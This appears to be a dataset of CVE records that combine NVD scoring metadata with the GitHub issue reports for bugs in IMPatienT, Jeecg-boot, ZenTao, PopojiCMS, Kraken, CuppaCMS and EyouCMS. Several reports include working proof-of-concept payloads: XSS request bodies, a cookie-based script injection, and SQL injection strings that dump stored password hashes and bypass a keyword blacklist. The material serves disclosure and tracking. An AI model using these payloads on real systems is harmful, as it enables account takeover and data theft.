650
4,622
CVE-2023-23637
2023-01-17T21:15:17.080
IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.6, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/compare/v1.5.1...v1.5.2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/issues/101" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/releases/tag/v1.5.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/compare/v1.5.1...v1.5.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/issues/101" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/lambda-science/IMPatienT/releases/tag/v1.5.2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:unistra:impatient:*:*:*:*:*:*:*:*", "matchCriteriaId": "79115836-AED1-4655-B3C4-A9E8081C6088", "versionEndExcluding": "1.5.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/lambda-science/IMPatienT/issues/101
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lambda-science", "IMPatienT" ]
A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637): Description: IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify_onto request. This may allow attackers to steal Protected Health Information (PHI). ![image](https://user-images.githubusercontent.com/24572555/212788363-4ac3cadb-b01d-4590-a725-c5f1259a0b43.png) Suggested Fix: Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637 https://nvd.nist.gov/vuln/detail/CVE-2023-23637 https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS) Payload: ``` PATCH /modify_onto HTTP/1.1 Host: 127.0.0.1:5000 Content-Length: 2218 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Origin: http://127.0.0.1:5000/ Referer: http://127.0.0.1:5000/ontocreate Connection: close [{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}] ```
[Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637
https://api.github.com/repos/lambda-science/IMPatienT/issues/101/comments
2
2023-01-17T01:21:04Z
2023-01-17T10:40:57Z
https://github.com/lambda-science/IMPatienT/issues/101
1,535,654,743
101
4,623
CVE-2022-47105
2023-01-19T16:15:11.277
Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4393" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4393" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "7BB811AB-8B4F-4A5A-8851-B617184A298A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4393
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
##### 版本号:3.4.4 ##### 前端版本:vue2版 ##### 问题描述:sql注入检测代码存在绕过. ##### 截图&代码: SqlInjectionUtil类中sql的注释正则为 ```java private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/"); ``` .无法匹配到%0A, 导致可以利用/\*%0A\*/绕过 关键字检测后存在空格,导致绕过 ```java private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()"; ``` AbstractQueryBlackListHandler类中的黑名单: ```java ruleMap.put("sys_user", "password,salt"); ``` 在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用`sys_user`, (sys_user), sys_user%20等绕过 存在多个注入点: 1. /sys/duplicate/check接口: ```java dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log ``` <img width="776" alt="image" src="https://user-images.githubusercontent.com/50673654/206842653-b762d643-9c64-4943-ba99-3b68433da3b0.png"> 2. /sys/api/getDictItems 该接口没有进行签名校验: <img width="918" alt="image" src="https://user-images.githubusercontent.com/50673654/206842298-694b3b2b-8ea4-4e55-a7f9-c26bd452c1ad.png"> ```java ?dictCode=sys_user%20,username,password ``` <img width="1227" alt="image" src="https://user-images.githubusercontent.com/50673654/206842680-083f2c1f-8c1a-47eb-a4f1-5eb7b677c4cb.png"> 3. sys/dict/queryTableData ```java ?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password ``` <img width="1228" alt="image" src="https://user-images.githubusercontent.com/50673654/206842700-9446ac05-18f2-4791-8e26-c78a1f934a09.png"> #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 描述过于简单或模糊,导致无法处理的,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
jeecg-boot3.4.4 存在sql注入漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4393/comments
2
2022-12-10T09:17:39Z
2022-12-23T06:03:37Z
https://github.com/jeecgboot/JeecgBoot/issues/4393
1,488,266,227
4,393
4,624
CVE-2022-47745
2023-01-19T18:15:15.133
ZenTao 16.4 to 18.0.beta1 is vulnerable to SQL injection. After logging in with any user, you can complete SQL injection by constructing a special request and sending it to function importNotice.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/easysoft/zentaopms/issues/106" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/l3s10n/ZenTaoPMS_SqlInjection" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/easysoft/zentaopms/issues/106" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/l3s10n/ZenTaoPMS_SqlInjection" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE5DA4C9-EF75-43D9-8C4E-9B3F3D463FEE", "versionEndExcluding": "18.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "16.4", "vulnerable": true }, { "criteria": "cpe:2.3:a:easycorp:zentao:18.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "A5DA4474-B643-4CF9-8B0D-359FFF798557", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/easysoft/zentaopms/issues/106
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "easysoft", "zentaopms" ]
![image](https://user-images.githubusercontent.com/72327909/205977751-4dd4ea24-986d-4a70-80ed-a375bc24ac9c.png) 执行一个创建数据库test的sql语句: ![image](https://user-images.githubusercontent.com/72327909/205977820-85c496f3-d200-4912-99cb-53b8b0a51963.png)
There is a SQL injection in the product. (项目中存在sql注入问题)
https://api.github.com/repos/easysoft/zentaopms/issues/106/comments
3
2022-12-06T17:12:56Z
2022-12-22T06:34:38Z
https://github.com/easysoft/zentaopms/issues/106
1,479,662,911
106
4,625
CVE-2022-47766
2023-01-19T19:15:11.463
PopojiCMS v2.0.1 backend plugin function has a file upload vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PopojiCMS/PopojiCMS/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PopojiCMS/PopojiCMS/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:popojicms:popojicms:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "2215DA94-615C-4B2C-BCC4-4497C233208C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/PopojiCMS/PopojiCMS/issues/35
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PopojiCMS", "PopojiCMS" ]
Exploit file upload vulnerability getshell Vulnerability details: In the administration backend, you can upload malicious builds of zip files in the plugin administration page. Vulnerability url: http://127.0.0.1/po-admin/admin.php?mod=component&act=addnew Steps: 1. First you need to have backend access 2. Prepare zip file containing malicious php 3. Caricamento di file in Componenti/Aggiungi componente ![image-20221212112707382](https://user-images.githubusercontent.com/120354137/207802477-113a9ab9-4179-42e4-bf0f-c9f3464e4744.png) ![image-20221212115132818](https://user-images.githubusercontent.com/120354137/207802720-3523260b-5240-48b3-8d0b-fb21d5291d89.png) ![image-20221212115143498](https://user-images.githubusercontent.com/120354137/207802808-0d7f829a-0e96-4014-a4d2-09d8ebfe2e53.png) 4. Next, you can find the php file at http://127.0.0.1/po-content/component/Component_Name/file_name Find the php file ![image-20221212115253701](https://user-images.githubusercontent.com/120354137/207802850-f82b0495-8d50-4037-ad24-50998053d134.png)
PopojiCMS v2.0.1 backend plugin function has file upload vulnerability
https://api.github.com/repos/PopojiCMS/PopojiCMS/issues/35/comments
0
2022-12-15T07:50:37Z
2022-12-15T07:50:37Z
https://github.com/PopojiCMS/PopojiCMS/issues/35
1,497,957,952
35
4,626
CVE-2022-47747
2023-01-20T17:15:10.937
kraken <= 0.1.4 has an arbitrary file read vulnerability via the component testfs.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/uber/kraken/issues/333" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/uber/kraken/issues/333" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uber:kraken:*:*:*:*:*:*:*:*", "matchCriteriaId": "74EEC586-3A72-481B-9132-2F023BEF6D01", "versionEndExcluding": null, "versionEndIncluding": "0.1.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/uber/kraken/issues/333
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "uber", "kraken" ]
I found an arbitrary file read vulnerability in the component testfs version <= 0.1.4 `lib/backend/testfs/server.go` <img width="704" alt="图片" src="https://user-images.githubusercontent.com/31311038/207622700-38f65f7f-f857-486c-9d19-91151bd92fe3.png"> <img width="686" alt="图片" src="https://user-images.githubusercontent.com/31311038/207622620-99ba96d9-8248-4427-a71d-4abc5253d33c.png"> <img width="923" alt="图片" src="https://user-images.githubusercontent.com/31311038/207622800-c4536a37-2ab9-4de0-8e7f-1d2bd802ece2.png">
I found an arbitrary file read vulnerability in the component testfs
https://api.github.com/repos/uber/kraken/issues/333/comments
0
2022-12-14T14:34:04Z
2022-12-14T14:34:04Z
https://github.com/uber/kraken/issues/333
1,496,768,446
333
4,627
CVE-2020-29297
2023-01-20T19:15:13.183
Multiple SQL Injection vulnerabilities in tourist5 Online-food-ordering-system 1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/kdrypr/999a245abb4511d43e41df1ccdbcf0cb" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/tourist5/Online-food-ordering-system" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tourist5/Online-food-ordering-system/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/kdrypr/999a245abb4511d43e41df1ccdbcf0cb" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/tourist5/Online-food-ordering-system" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tourist5/Online-food-ordering-system/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_food_ordering_system_project:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EFA88B02-BA58-4918-B40A-37DF4185FD07", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/tourist5/Online-food-ordering-system/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tourist5", "Online-food-ordering-system" ]
Hi, You have lots of sql injection vulnerabilities. You can write your code with parametrized query for mitigation of sql injection. Example-1: https://github.com/tourist5/Online-food-ordering-system/blob/main/all-tickets.php if(isset($_GET['status'])){ $status = $_GET['status']; } else{ $status = '%'; } $sql = mysqli_query($con, "SELECT * FROM comments WHERE status LIKE '$status';"); You can exploit the parameter of $status. Example-2: https://github.com/tourist5/Online-food-ordering-system/blob/main/view-ticket.php You can exploit $id parameter.
SQL Injection Vulnerabilities
https://api.github.com/repos/tourist5/Online-food-ordering-system/issues/1/comments
0
2020-11-25T15:04:31Z
2020-11-25T15:04:31Z
https://github.com/tourist5/Online-food-ordering-system/issues/1
750,894,975
1
4,628
CVE-2021-29368
2023-01-20T19:15:13.250
Session fixation vulnerability in CuppaCMS thru commit 4c9b742b23b924cf4c1f943f48b278e06a17e297 on November 12, 2019 allows attackers to gain access to arbitrary user sessions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:*:*:*:*:*:*:*:*", "matchCriteriaId": "25182935-24F3-4028-A4E5-95BB51377EB7", "versionEndExcluding": null, "versionEndIncluding": "2019-11-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "384" ]
384
https://github.com/CuppaCMS/CuppaCMS/issues/8
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
**Cuppa CMS is prone to a session fixation attack.** Description: Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. When authenticating a user, it doesn’t assign a new session ID, making it possible to use an existent session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim’s browser use it. **Steps to Reproduce:** 1. Access the cuppa cms login page using the http://127.0.0.1:880/cuppa_cms/administrator/ 2. Enter the wrong username and password to generate dummy session tokens 3. Copy the non-authenticated session tokens and insert it into another browser(chrome) in the victim machine. 4. Enter the valid credential to log in to the application. 5. Once you login to the application go back to the attacker browser and refresh the URL. 6. An attacker is able to access the victim session successfully. **Session Values Before Login: Attacker Machine** ![firefox before login1](https://user-images.githubusercontent.com/24879082/84803763-0a82ae80-b020-11ea-98b4-09d8293311ec.png) **Session Values Before Login: Victim Machine** ![chrome before login](https://user-images.githubusercontent.com/24879082/84804125-32721200-b020-11ea-994d-0d8c2245caaf.PNG) **Session token once fix the victim Machine** ![chrome session token fixed](https://user-images.githubusercontent.com/24879082/84804351-474ea580-b020-11ea-84d4-88b29367cd5f.png) **Session Values after Login: Victim Machine** ![chrome after auth](https://user-images.githubusercontent.com/24879082/84804591-a1e80180-b020-11ea-85d1-ff29baeef45e.PNG) **Session Values for the attacker - Just refresh the browser** ![firefox sucess](https://user-images.githubusercontent.com/24879082/84804634-b0361d80-b020-11ea-9f81-bf181cc17a52.png) **Mitigation:** The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session.
Session Fixation in CuppaCMS
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/8/comments
1
2020-06-16T17:01:59Z
2020-07-01T14:53:11Z
https://github.com/CuppaCMS/CuppaCMS/issues/8
639,831,189
8
4,629
CVE-2022-45537
2023-01-20T19:15:16.093
EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_LIST_URL".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EC81B77-6034-40EF-93BE-42D2F85B3974", "versionEndExcluding": null, "versionEndIncluding": "1.6.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/34
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
## Background of Website Reflected Cross-Site Scripting ### Influenced Version <= 1.6.0-UTF8-SP1 <img width="2048" alt="image" src="https://user-images.githubusercontent.com/22876693/201610031-73f82844-05e0-4182-a275-028613c349bd.png"> ### Description Background article publish with reflected-XSS in the cookie "ENV_LIST_URL". ### POC ```text POST /cms/eyoucms/login.php?m=admin&c=Article&a=add&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://127.0.0.1 Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Article&a=add&typeid=10&gourl=http%3A%2F%2F10.142.11.10%3A20003%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D10%26lang%3Dcn&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; workspaceParam=index%7CArchives; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3D=cn; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn"/><script>alert(1)</script><a Content-Type: application/x-www-form-urlencoded Content-Length: 383 gourl=&free_content=&htmlfilename=&type_tempview=view_article.htm&tempview=view_article.htm&add_time=2022-11-05+20:47:11&arcrank=0&click=846&author=aa&seo_description=gaeg&seo_keywords=egae&seo_title=aeg&tags=aeg%2C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&addonFieldExt[content]=<p>aegaeg</p>&size=1&part_free=0&users_price=&litpic_remote=&litpic_local=&jumplinks=&typeid=11&title=aegaeg ``` ### Screen Shoot <img width="1865" alt="image" src="https://user-images.githubusercontent.com/22876693/201614458-17b781bf-148a-419c-9b92-7e9f0527d78d.png"> > Reported by Srpopty, vulnerability discovered by using Corax.
Vulnerability: EyouCMS-V1.6.0-UTF8-SP1 with Reflected Cross-Site Scripting
https://api.github.com/repos/weng-xianhu/eyoucms/issues/34/comments
1
2022-11-14T08:44:20Z
2023-02-20T10:13:49Z
https://github.com/weng-xianhu/eyoucms/issues/34
1,447,630,496
34
4,630
CVE-2022-45538
2023-01-20T19:15:16.160
EyouCMS <= 1.6.0 was discovered a reflected-XSS in the article publish component in cookie "ENV_GOBACK_URL".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
